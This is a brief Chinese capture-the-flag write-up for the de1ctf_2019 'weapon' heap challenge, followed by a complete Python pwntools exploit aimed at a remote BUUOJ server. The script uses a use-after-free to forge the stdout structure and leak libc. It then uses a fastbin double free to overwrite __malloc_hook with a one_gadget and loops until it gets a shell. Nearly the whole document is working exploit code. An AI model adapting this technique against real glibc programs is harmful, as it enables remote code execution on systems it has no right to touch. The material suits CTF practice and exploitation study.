這題我多了一個換行搞了老久了服了還是tcl
思路
有uaf通過寫IO來得到libc地址然後通過double free來拿到shell
exp:
#!/usr/bin/python2
from pwn import *
p=0
def pwn():
global p
#p=process('./de1ctf_2019_weapon')
p=remote('node3.buuoj.cn',29212)
elf=ELF('./de1ctf_2019_weapon')
libc=elf.libc
def add(size,idx,name):
p.sendlineafter('>>','1')
p.sendlineafter(': ',str(size))
p.sendlineafter(': ',str(idx))
p.sendafter(':',name)
def delete(idx):
p.sendlineafter('>>','2')
p.sendlineafter(':',str(idx))
def edit(idx,data):
p.sendlineafter('>>','3')
p.sendlineafter(': ',str(idx))
p.sendafter(':',data)
payload=p64(0)*1+p64(0x71)
add(0x28,0,payload)
add(0x18,1,'cccc')
add(0x38,2,'dddd')
add(0x60,3,'\x02'*2)
add(0x60,4,'aaaa')
add(0x60,5,'bbbb')
delete(3)
delete(4)
edit(4,'\x10')
add(0x60,8,'dd')
add(0x60,7,p64(0)*3+p64(0x21)+p64(0)*3+p64(0xb1))
delete(2)
delete(3)
add(0x38,2,'aaa')
edit(3,'\xdd\x85')
payload='\x00'*(0x40+3-0x10)+p64(0x1800)+'\x00'*0x19
payload1='\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0)
add(0x60,8,'aaa')
add(0x60,9,payload1)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c5600
malloc_hook=libcbase+libc.sym['__malloc_hook']
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libcbase+o_g[3]
delete(3)
delete(4)
delete(3)
add(0x60,3,p64(malloc_hook-0x23))
add(0x60,6,'doudou')
add(0x60,4,'doudou1')
add(0x60,8,'a'*0x13+p64(one_gadget))
log.success('libcbase: '+hex(libcbase))
p.sendlineafter('>>','1')
p.sendlineafter(': ',str(0x20))
p.sendlineafter(': ',str(8))
p.interactive()
return True
if __name__=="__main__":
while 1:
try:
if pwn()==True:
break
except Exception as e:
p.close()
continue